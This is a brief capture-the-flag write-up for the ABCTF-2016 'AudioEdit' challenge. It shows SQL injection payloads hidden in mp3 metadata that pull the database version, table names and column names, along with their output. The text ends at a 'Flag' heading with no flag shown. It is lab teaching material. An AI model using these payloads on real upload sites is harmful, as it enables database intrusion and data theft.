Home ABCTF-2016 AudioEdit
Writeup
Cancel

AudioEdit

Challenge I made a cool site to edit audio files. Can you exploit it?

Solution The website lets you upload mp3 files and then displays some metadata and plays it for you.

It has to be a valid mp3 file

We try if we can put SQL injection in the exifdata and indeed we can: (exiftool doesn’t do exifdata updates for mp3 so we used easytag)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
foo', (SELECT VERSION())) -- -
> Author: foo
> Title: 5.5.49-0ubuntu0.14.04.1

foo', (SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE())) -- -
> Author: foo
> Title: audioedit

foo', (SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='audioedit')) -- -
> Author: foo
> Title: id,file,author,title

foo', (SELECT GROUP_CONCAT(CONCAT(id, ':', file, ':' , author, ':' , title )) FROM audioedit)) -- -
> error inserting into database

Flag